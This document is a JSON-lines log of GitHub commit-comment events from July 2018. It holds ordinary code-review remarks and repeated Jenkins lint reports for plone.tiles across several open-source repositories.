{"id":"7915807665","type":"CommitCommentEvent","actor":{"login":"NN708"},"repo":{"name":"obstudio/Thulium-Music-3"},"payload":{"comment":{"id":29589048,"position":102,"line":84,"path":"themes/simple.scss","commit_id":"d647bd8ad0b8c41e8eea0bbd2d24b17c09b56cc4","created_at":"2018-07-04T01:51:30Z","updated_at":"2018-07-04T01:51:30Z","author_association":"MEMBER","body":"已在 3623a73 中修改"}},"created_at":"2018-07-04T01:51:30Z"}
{"id":"7915822780","type":"CommitCommentEvent","actor":{"login":"AndyOchoaS"},"repo":{"name":"Automattic/mongoose"},"payload":{"comment":{"id":29589076,"position":null,"line":null,"path":null,"commit_id":"727eda48bcecfb8f4462162863e7beb7bca18fdb","created_at":"2018-07-04T01:58:03Z","updated_at":"2018-07-04T01:58:03Z","author_association":"NONE","body":"This change don't allow to connect to MongoDB Atlas with Mongoose by default."}},"created_at":"2018-07-04T01:58:03Z"}
{"id":"7915823359","type":"CommitCommentEvent","actor":{"login":"OkayJosh"},"repo":{"name":"OkayJosh/django-polls"},"payload":{"comment":{"id":29589079,"position":null,"line":null,"path":null,"commit_id":"feff1bc7836228aaeb7c214f61fd4c8795c34cf7","created_at":"2018-07-04T01:58:18Z","updated_at":"2018-07-04T01:58:18Z","author_association":"OWNER","body":"Ok"}},"created_at":"2018-07-04T01:58:18Z"}
{"id":"7915824553","type":"CommitCommentEvent","actor":{"login":"blueprint-bot"},"repo":{"name":"palantir/blueprint"},"payload":{"comment":{"id":29589081,"position":null,"line":null,"path":null,"commit_id":"5c106b58daf37de49bebd9ddf31d9d1d8a98cd25","created_at":"2018-07-04T01:58:50Z","updated_at":"2018-07-04T01:58:50Z","author_association":"COLLABORATOR","body":"<h3>Tests added</h3>\n\nPreview: <strong><a href='https://17839-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/docs-app/dist/index.html' target='_blank'>documentation</a> | <a href='https://17839-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/landing-app/dist/index.html' target='_blank'>landing</a> | <a href='https://17839-71939872-gh.circle-artifacts.com/0/home/circleci/project/packages/table-dev-app/dist/index.html' target='_blank'>table</a></strong>"}},"created_at":"2018-07-04T01:58:50Z"}
{"id":"7917491326","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29592819,"position":209,"line":209,"path":"tests/qgraph/qgraph.h","commit_id":"cd4581cb9c33d05457b255d7eaf73df2c823aede","created_at":"2018-07-04T10:00:23Z","updated_at":"2018-07-04T10:00:23Z","author_association":"NONE","body":"s/separe/separate/\r\n\r\nMaybe split in two headers, one for public functions and one for private functions (not used outside the infrastructure and gtest integration patches)."}},"created_at":"2018-07-04T10:00:23Z"}
{"id":"7917496681","type":"CommitCommentEvent","actor":{"login":"edmondscommerce"},"repo":{"name":"phpstan/phpstan-shim"},"payload":{"comment":{"id":29592829,"position":null,"line":null,"path":null,"commit_id":"0db0041624bd0ccbcf944be6a86880e8663fc3e2","created_at":"2018-07-04T10:01:20Z","updated_at":"2018-07-04T10:01:20Z","author_association":"NONE","body":"Why is this replacing `nikic/php-parser`?\r\n\r\nThis is causing me major problems"}},"created_at":"2018-07-04T10:01:20Z"}
{"id":"7917496847","type":"CommitCommentEvent","actor":{"login":"csadesz"},"repo":{"name":"green-fox-academy/szlaszlo1"},"payload":{"comment":{"id":29592832,"position":21,"line":17,"path":"Week 8/DAY2/TodoApp/TodoApp/Controllers/TodoController.cs","commit_id":"6e84498a5c7332a133c5289f34a484e12706b133","created_at":"2018-07-04T10:01:21Z","updated_at":"2018-07-04T10:01:21Z","author_association":"NONE","body":"Care about naming conventions"}},"created_at":"2018-07-04T10:01:21Z"}
{"id":"7917498190","type":"CommitCommentEvent","actor":{"login":"csadesz"},"repo":{"name":"green-fox-academy/szlaszlo1"},"payload":{"comment":{"id":29592833,"position":13,"line":13,"path":"Week 8/DAY2/TodoApp/TodoApp/Models/TodoContext.cs","commit_id":"6e84498a5c7332a133c5289f34a484e12706b133","created_at":"2018-07-04T10:01:35Z","updated_at":"2018-07-04T10:01:35Z","author_association":"NONE","body":"and missing spaces"}},"created_at":"2018-07-04T10:01:35Z"}
{"id":"7917499300","type":"CommitCommentEvent","actor":{"login":"kutzi"},"repo":{"name":"serenity-bdd/serenity-core"},"payload":{"comment":{"id":29592839,"position":30,"line":51,"path":"serenity-core/src/main/java/net/thucydides/core/steps/StepEventBus.java","commit_id":"487a8764926f60e8916e0932b4988fd23f49f56b","created_at":"2018-07-04T10:01:47Z","updated_at":"2018-07-04T10:01:47Z","author_association":"CONTRIBUTOR","body":"If it's a ThreadLocal why would you need synchronized?"}},"created_at":"2018-07-04T10:01:47Z"}
{"id":"7917500785","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29592844,"position":13,"line":13,"path":"tests/qgraph/raspi2-machine.c","commit_id":"c9cbe1c4cd7aaf6bb86845536a20b3d775b3b2f2","created_at":"2018-07-04T10:02:03Z","updated_at":"2018-07-04T10:02:03Z","author_association":"NONE","body":"No need for these comments, it's more or less self evident."}},"created_at":"2018-07-04T10:02:03Z"}
{"id":"7917506425","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29592864,"position":12,"line":12,"path":"tests/qgraph/qgraph.h","commit_id":"cd4581cb9c33d05457b255d7eaf73df2c823aede","created_at":"2018-07-04T10:03:09Z","updated_at":"2018-07-04T10:03:09Z","author_association":"NONE","body":"I know, I know, but I don't like this name particularly. More important, the cast to QOSGraphObject doesn't apply to `get_driver`, only `get_device`.  Do you mind getting rid of the macro and just including it verbatim whenever it is used?"}},"created_at":"2018-07-04T10:03:09Z"}
{"id":"7917514499","type":"CommitCommentEvent","actor":{"login":"teabot"},"repo":{"name":"ExpediaInc/apiary-metastore-docker"},"payload":{"comment":{"id":29592886,"position":7,"line":37,"path":"files/startup.sh","commit_id":"5dc01ec5c80be6256226f39835d7c767e5133a0c","created_at":"2018-07-04T10:04:43Z","updated_at":"2018-07-04T10:04:43Z","author_association":"MEMBER","body":"Should this region be configurable?"}},"created_at":"2018-07-04T10:04:43Z"}
{"id":"7917517711","type":"CommitCommentEvent","actor":{"login":"FleischKarussel"},"repo":{"name":"jtyr/ansible-motd"},"payload":{"comment":{"id":29592897,"position":17,"line":44,"path":"README.md","commit_id":"b06bf8503cef003f5f17b1dd70bbfedc2a257289","created_at":"2018-07-04T10:05:21Z","updated_at":"2018-07-04T10:05:21Z","author_association":"NONE","body":"Hello Jiri,\r\nthanks for your detailed explanation!\r\nThis made it clear and I was able to successfully replace the ascii art.\r\nMissing the two spaces  in front of all lines before the characters was the problem I run into.\r\n\r\nBest regards\r\nBenjamin"}},"created_at":"2018-07-04T10:05:21Z"}
{"id":"7917518989","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":29592902,"position":null,"line":null,"path":null,"commit_id":"020d5c893f1d781d5671e1e68ba287a71a7b6597","created_at":"2018-07-04T10:05:36Z","updated_at":"2018-07-04T10:05:36Z","author_association":"NONE","body":"@jensens Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-plone.tiles/16/violations\n```\nplone/tiles/testing.py:42:45: C812 missing trailing comma\nplone/tiles/testing.py:45:9: D001 found xmlconfig.file( replace it with self.loadZCML(\nplone/tiles/testing.py:47:9: D001 found xmlconfig.file( replace it with self.loadZCML(\nplone/tiles/testing.py:58:33: C812 missing trailing comma\nplone/tiles/data.py:28:1: I003 isort expected 1 blank line in imports, found 0\nplone/tiles/data.py:205:1: C901 'map_to_pairs' is too complex (14)\nplone/tiles/data.py:239:28: C812 missing trailing comma\nplone/tiles/data.py:252:24: C812 missing trailing comma\nplone/tiles/data.py:257:1: C901 'encode' is too complex (17)\nplone/tiles/data.py:282:36: C812 missing trailing comma\nplone/tiles/data.py:283:18: C812 missing trailing comma\nplone/tiles/data.py:304:51: C812 missing trailing comma\nplone/tiles/data.py:305:22: C812 missing trailing comma\nplone/tiles/data.py:312:36: C812 missing trailing comma\nplone/tiles/data.py:343:1: C901 'decode' is too complex (14)\nplone/tiles/interfaces.py:70:37: C812 missing trailing comma\nplone/tiles/type.py:21:20: C812 missing trailing comma\nplone/tiles/type.py:41:16: Q000 Remove bad quotes.\nplone/tiles/type.py:43:23: C812 missing trailing comma\nplone/tiles/tile.py:9:1: I001 isort found an import in the wrong position\nplone/tiles/tile.py:57:29: C812 missing trailing comma\nplone/tiles/tile.py:89:48: C812 missing trailing comma\nplone/tiles/esi.py:12:1: I003 isort expected 1 blank line in imports, found 0\nplone/tiles/esi.py:12:1: I003 isort expected 1 blank line in imports, found 0\nplone/tiles/esi.py:12:1: I003 isort expected 1 blank line in imports, found 0\nplone/tiles/esi.py:17:1: I001 isort found an import in the wrong position\nplone/tiles/esi.py:18:1: I001 isort found an import in the wrong position\nplone/tiles/esi.py:19:1: I001 isort found an import in the wrong position\nplone/tiles/esi.py:28:16: Q001 Remove bad quotes from multiline string.\nplone/tiles/esi.py:33:65: Q001 Remove bad quotes from multiline string.\nplone/tiles/esi.py:50:10: C812 missing trailing comma\nplone/tiles/esi.py:55:17: C812 missing trailing comma\nplone/tiles/esi.py:65:13: Q000 Remove bad quotes.\nplone/tiles/esi.py:77:29: C812 missing trailing comma\nplone/tiles/__init__.py:4:1: I003 isort expected 1 blank line in imports, found 0\nplone/tiles/meta.py:23:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:24:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:29:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:30:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:31:23: C812 missing trailing comma\nplone/tiles/meta.py:35:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:37:23: C812 missing trailing comma\nplone/tiles/meta.py:41:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:42:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:43:23: C812 missing trailing comma\nplone/tiles/meta.py:47:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:48:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:49:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:54:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:55:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:60:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:61:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:66:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:67:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:72:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:77:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:78:23: C812 missing trailing comma\nplone/tiles/meta.py:82:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:83:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:84:23: C812 missing trailing comma\nplone/tiles/meta.py:88:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:89:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:94:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:95:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:126:26: C812 missing trailing comma\nplone/tiles/meta.py:139:80: C812 missing trailing comma\nplone/tiles/tests/test_data.py:19:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:25:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:29:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:38:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:47:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:50:1: E305 expected 2 blank lines after class or function definition, found 1\nplone/tiles/tests/test_data.py:62:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:68:78: C812 missing trailing comma\nplone/tiles/tests/test_data.py:73:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:77:54: C812 missing trailing comma\nplone/tiles/tests/test_data.py:82:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:86:15: C812 missing trailing comma\nplone/tiles/tests/test_data.py:96:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:101:40: C812 missing trailing comma\nplone/tiles/tests/test_data.py:102:14: C812 missing trailing comma\nplone/tiles/tests/test_data.py:107:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:111:15: C812 missing trailing comma\nplone/tiles/tests/test_doctests.py:17:45: C812 missing trailing comma\nplone/tiles/tests/test_doctests.py:19:50: C812 missing trailing comma\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-04T10:05:36Z"}
{"id":"7917520083","type":"CommitCommentEvent","actor":{"login":"cfbgc"},"repo":{"name":"mapr/incubator-drill"},"payload":{"comment":{"id":29592906,"position":13,"line":66,"path":"exec/jdbc/src/main/java/org/apache/drill/jdbc/impl/DriverImpl.java","commit_id":"13f21e14b4f0832abba8e5632d8fa4e7a6a27635","created_at":"2018-07-04T10:05:51Z","updated_at":"2018-07-04T10:05:51Z","author_association":"NONE","body":"DrillVersionInfo is not found,How to get it"}},"created_at":"2018-07-04T10:05:51Z"}
{"id":"7917520529","type":"CommitCommentEvent","actor":{"login":"EmptyWalletException"},"repo":{"name":"EmptyWalletException/TopTalk"},"payload":{"comment":{"id":29592907,"position":null,"line":null,"path":null,"commit_id":"22d66e015bebf6f0efe259424e10f34fc299904d","created_at":"2018-07-04T10:05:56Z","updated_at":"2018-07-04T10:05:56Z","author_association":"OWNER","body":"\r\n[toptalk.zip](https://github.com/EmptyWalletException/TopTalk/files/2162756/toptalk.zip)\r\n解压后即可,另外我收到了此消息的邮件,但是邮件回复不知道是否能到达你的邮箱,你可以仔细查看项目里的controller来跳转到投稿功能,通过投稿即可向数据库中添加数据"}},"created_at":"2018-07-04T10:05:56Z"}
{"id":"7917523527","type":"CommitCommentEvent","actor":{"login":"csadesz"},"repo":{"name":"green-fox-academy/szlaszlo1"},"payload":{"comment":{"id":29592913,"position":null,"line":null,"path":null,"commit_id":"aa3fad138e2e5cd15058b735e1eeff6281e4ec01","created_at":"2018-07-04T10:06:31Z","updated_at":"2018-07-04T10:06:31Z","author_association":"NONE","body":"Despite of you sometimes you used not really cool variable namings, it's a nice looking code! Good job! 👍 "}},"created_at":"2018-07-04T10:06:31Z"}
{"id":"7917525226","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":29592915,"position":null,"line":null,"path":null,"commit_id":"53edac69d548645f2a676e45dbc52af9d5de6097","created_at":"2018-07-04T10:06:50Z","updated_at":"2018-07-04T10:06:50Z","author_association":"NONE","body":"@jensens Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-plone.tiles/17/violations\n```\nplone/tiles/testing.py:42:45: C812 missing trailing comma\nplone/tiles/testing.py:45:9: D001 found xmlconfig.file( replace it with self.loadZCML(\nplone/tiles/testing.py:47:9: D001 found xmlconfig.file( replace it with self.loadZCML(\nplone/tiles/testing.py:58:33: C812 missing trailing comma\nplone/tiles/data.py:28:1: I003 isort expected 1 blank line in imports, found 0\nplone/tiles/data.py:205:1: C901 'map_to_pairs' is too complex (14)\nplone/tiles/data.py:239:28: C812 missing trailing comma\nplone/tiles/data.py:252:24: C812 missing trailing comma\nplone/tiles/data.py:257:1: C901 'encode' is too complex (17)\nplone/tiles/data.py:282:36: C812 missing trailing comma\nplone/tiles/data.py:283:18: C812 missing trailing comma\nplone/tiles/data.py:304:51: C812 missing trailing comma\nplone/tiles/data.py:305:22: C812 missing trailing comma\nplone/tiles/data.py:312:36: C812 missing trailing comma\nplone/tiles/data.py:343:1: C901 'decode' is too complex (14)\nplone/tiles/interfaces.py:70:37: C812 missing trailing comma\nplone/tiles/type.py:21:20: C812 missing trailing comma\nplone/tiles/type.py:41:16: Q000 Remove bad quotes.\nplone/tiles/type.py:43:23: C812 missing trailing comma\nplone/tiles/tile.py:9:1: I001 isort found an import in the wrong position\nplone/tiles/tile.py:57:29: C812 missing trailing comma\nplone/tiles/tile.py:89:48: C812 missing trailing comma\nplone/tiles/esi.py:12:1: I003 isort expected 1 blank line in imports, found 0\nplone/tiles/esi.py:12:1: I003 isort expected 1 blank line in imports, found 0\nplone/tiles/esi.py:12:1: I003 isort expected 1 blank line in imports, found 0\nplone/tiles/esi.py:17:1: I001 isort found an import in the wrong position\nplone/tiles/esi.py:18:1: I001 isort found an import in the wrong position\nplone/tiles/esi.py:19:1: I001 isort found an import in the wrong position\nplone/tiles/esi.py:28:16: Q001 Remove bad quotes from multiline string.\nplone/tiles/esi.py:33:65: Q001 Remove bad quotes from multiline string.\nplone/tiles/esi.py:50:10: C812 missing trailing comma\nplone/tiles/esi.py:55:17: C812 missing trailing comma\nplone/tiles/esi.py:65:13: Q000 Remove bad quotes.\nplone/tiles/esi.py:77:29: C812 missing trailing comma\nplone/tiles/__init__.py:4:1: I003 isort expected 1 blank line in imports, found 0\nplone/tiles/meta.py:23:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:24:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:29:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:30:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:31:23: C812 missing trailing comma\nplone/tiles/meta.py:35:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:37:23: C812 missing trailing comma\nplone/tiles/meta.py:41:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:42:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:43:23: C812 missing trailing comma\nplone/tiles/meta.py:47:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:48:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:49:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:54:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:55:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:60:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:61:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:66:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:67:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:72:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:77:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:78:23: C812 missing trailing comma\nplone/tiles/meta.py:82:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:83:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:84:23: C812 missing trailing comma\nplone/tiles/meta.py:88:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:89:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:94:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:95:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:126:26: C812 missing trailing comma\nplone/tiles/meta.py:139:80: C812 missing trailing comma\nplone/tiles/tests/test_data.py:19:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:25:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:29:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:38:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:47:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:50:1: E305 expected 2 blank lines after class or function definition, found 1\nplone/tiles/tests/test_data.py:62:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:68:78: C812 missing trailing comma\nplone/tiles/tests/test_data.py:73:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:77:54: C812 missing trailing comma\nplone/tiles/tests/test_data.py:82:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:86:15: C812 missing trailing comma\nplone/tiles/tests/test_data.py:96:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:101:40: C812 missing trailing comma\nplone/tiles/tests/test_data.py:102:14: C812 missing trailing comma\nplone/tiles/tests/test_data.py:107:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:111:15: C812 missing trailing comma\nplone/tiles/tests/test_doctests.py:17:45: C812 missing trailing comma\nplone/tiles/tests/test_doctests.py:19:50: C812 missing trailing comma\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-04T10:06:50Z"}
{"id":"7917531652","type":"CommitCommentEvent","actor":{"login":"esposem"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29592933,"position":12,"line":12,"path":"tests/qgraph/qgraph.h","commit_id":"cd4581cb9c33d05457b255d7eaf73df2c823aede","created_at":"2018-07-04T10:08:06Z","updated_at":"2018-07-04T10:08:06Z","author_association":"OWNER","body":"No problem at all"}},"created_at":"2018-07-04T10:08:06Z"}
{"id":"7917532447","type":"CommitCommentEvent","actor":{"login":"Rolandkuku"},"repo":{"name":"esgiprojetninja/devAwayApi"},"payload":{"comment":{"id":29592935,"position":null,"line":null,"path":null,"commit_id":"2b7191eca876eec6c3c921798f483c62ebb67619","created_at":"2018-07-04T10:08:15Z","updated_at":"2018-07-04T10:08:15Z","author_association":"CONTRIBUTOR","body":"BRAVO"}},"created_at":"2018-07-04T10:08:15Z"}
{"id":"7917532481","type":"CommitCommentEvent","actor":{"login":"jenkins-plone-org"},"repo":{"name":"plone/plone.tiles"},"payload":{"comment":{"id":29592936,"position":null,"line":null,"path":null,"commit_id":"c5dd5669f94aec74da9523990bc39efe4a0bca91","created_at":"2018-07-04T10:08:16Z","updated_at":"2018-07-04T10:08:16Z","author_association":"NONE","body":"@jensens Jenkins CI reporting about code analysis\nSee the full report here: https://jenkins.plone.org/job/package-plone.tiles/18/violations\n```\nplone/tiles/testing.py:42:45: C812 missing trailing comma\nplone/tiles/testing.py:45:9: D001 found xmlconfig.file( replace it with self.loadZCML(\nplone/tiles/testing.py:47:9: D001 found xmlconfig.file( replace it with self.loadZCML(\nplone/tiles/testing.py:58:33: C812 missing trailing comma\nplone/tiles/data.py:206:1: C901 'map_to_pairs' is too complex (14)\nplone/tiles/data.py:240:28: C812 missing trailing comma\nplone/tiles/data.py:253:24: C812 missing trailing comma\nplone/tiles/data.py:258:1: C901 'encode' is too complex (17)\nplone/tiles/data.py:283:36: C812 missing trailing comma\nplone/tiles/data.py:284:18: C812 missing trailing comma\nplone/tiles/data.py:305:51: C812 missing trailing comma\nplone/tiles/data.py:306:22: C812 missing trailing comma\nplone/tiles/data.py:313:36: C812 missing trailing comma\nplone/tiles/data.py:344:1: C901 'decode' is too complex (14)\nplone/tiles/interfaces.py:70:37: C812 missing trailing comma\nplone/tiles/type.py:21:20: C812 missing trailing comma\nplone/tiles/type.py:41:16: Q000 Remove bad quotes.\nplone/tiles/type.py:43:23: C812 missing trailing comma\nplone/tiles/tile.py:57:29: C812 missing trailing comma\nplone/tiles/tile.py:89:48: C812 missing trailing comma\nplone/tiles/esi.py:31:16: Q001 Remove bad quotes from multiline string.\nplone/tiles/esi.py:36:65: Q001 Remove bad quotes from multiline string.\nplone/tiles/esi.py:53:10: C812 missing trailing comma\nplone/tiles/esi.py:58:17: C812 missing trailing comma\nplone/tiles/esi.py:68:13: Q000 Remove bad quotes.\nplone/tiles/esi.py:80:29: C812 missing trailing comma\nplone/tiles/__init__.py:4:1: I003 isort expected 1 blank line in imports, found 0\nplone/tiles/meta.py:23:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:24:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:29:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:30:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:31:23: C812 missing trailing comma\nplone/tiles/meta.py:35:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:37:23: C812 missing trailing comma\nplone/tiles/meta.py:41:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:42:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:43:23: C812 missing trailing comma\nplone/tiles/meta.py:47:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:48:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:49:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:54:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:55:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:60:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:61:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:66:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:67:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:72:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:77:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:78:23: C812 missing trailing comma\nplone/tiles/meta.py:82:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:83:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:84:23: C812 missing trailing comma\nplone/tiles/meta.py:88:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:89:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:94:15: Q000 Remove bad quotes.\nplone/tiles/meta.py:95:21: Q000 Remove bad quotes.\nplone/tiles/meta.py:126:26: C812 missing trailing comma\nplone/tiles/meta.py:139:80: C812 missing trailing comma\nplone/tiles/tests/test_data.py:19:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:25:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:29:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:38:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:47:23: C812 missing trailing comma\nplone/tiles/tests/test_data.py:50:1: E305 expected 2 blank lines after class or function definition, found 1\nplone/tiles/tests/test_data.py:62:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:68:78: C812 missing trailing comma\nplone/tiles/tests/test_data.py:73:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:77:54: C812 missing trailing comma\nplone/tiles/tests/test_data.py:82:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:86:15: C812 missing trailing comma\nplone/tiles/tests/test_data.py:96:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:101:40: C812 missing trailing comma\nplone/tiles/tests/test_data.py:102:14: C812 missing trailing comma\nplone/tiles/tests/test_data.py:107:36: C812 missing trailing comma\nplone/tiles/tests/test_data.py:111:15: C812 missing trailing comma\nplone/tiles/tests/test_doctests.py:17:45: C812 missing trailing comma\nplone/tiles/tests/test_doctests.py:19:50: C812 missing trailing comma\n```\nFollow [these instructions](https://github.com/plone/jenkins.plone.org/blob/master/docs/source/run-qa-on-package.rst) to reproduce it locally."}},"created_at":"2018-07-04T10:08:16Z"}
{"id":"7917532686","type":"CommitCommentEvent","actor":{"login":"csadesz"},"repo":{"name":"green-fox-academy/szlaszlo1"},"payload":{"comment":{"id":29592937,"position":null,"line":null,"path":null,"commit_id":"984598f2ff3269e5793d3481c3efa7271d135650","created_at":"2018-07-04T10:08:18Z","updated_at":"2018-07-04T10:08:18Z","author_association":"NONE","body":"Try to follow a styleguide of commit messages, for example:\r\n\r\nhttps://gist.github.com/stephenparish/9941e89d80e2bc58a153"}},"created_at":"2018-07-04T10:08:18Z"}
{"id":"7917534908","type":"CommitCommentEvent","actor":{"login":"ruchgarcia"},"repo":{"name":"ruchgarcia/html"},"payload":{"comment":{"id":29592940,"position":null,"line":null,"path":null,"commit_id":"d8bdd961e5610e9b3f18c7069983008d78eab68e","created_at":"2018-07-04T10:08:44Z","updated_at":"2018-07-04T10:08:44Z","author_association":"OWNER","body":"This is a crash course by Brad Traversy."}},"created_at":"2018-07-04T10:08:44Z"}
{"id":"7917537665","type":"CommitCommentEvent","actor":{"login":"esposem"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29592945,"position":13,"line":13,"path":"tests/qgraph/raspi2-machine.c","commit_id":"c9cbe1c4cd7aaf6bb86845536a20b3d775b3b2f2","created_at":"2018-07-04T10:09:18Z","updated_at":"2018-07-04T10:09:18Z","author_association":"OWNER","body":"get rid of all of them? Also in qgraph.c ? "}},"created_at":"2018-07-04T10:09:18Z"}
{"id":"7917537967","type":"CommitCommentEvent","actor":{"login":"devashishmamgain"},"repo":{"name":"AppLozic/Applozic-Web-Plugin"},"payload":{"comment":{"id":29592946,"position":6,"line":3748,"path":"public/plugin/css/app/sidebox/applozic.sidebox.css","commit_id":"cde98f0c386af2dea4d1b4c45002f07d1a972ca3","created_at":"2018-07-04T10:09:21Z","updated_at":"2018-07-04T10:09:21Z","author_association":"MEMBER","body":"@ab14bhardwaj can we remove font-family? is the css same for sidebox and fullview? if yes then we can move it to a common css file."}},"created_at":"2018-07-04T10:09:21Z"}
{"id":"7917540054","type":"CommitCommentEvent","actor":{"login":"devashishmamgain"},"repo":{"name":"AppLozic/Applozic-Web-Plugin"},"payload":{"comment":{"id":29592953,"position":7,"line":49,"path":"public/plugin/js/app/applozic.common.js","commit_id":"cde98f0c386af2dea4d1b4c45002f07d1a972ca3","created_at":"2018-07-04T10:09:47Z","updated_at":"2018-07-04T10:09:47Z","author_association":"MEMBER","body":"@ab14bhardwaj same code inside if and else element.classList.add(\"mck-badge-count\");"}},"created_at":"2018-07-04T10:09:47Z"}
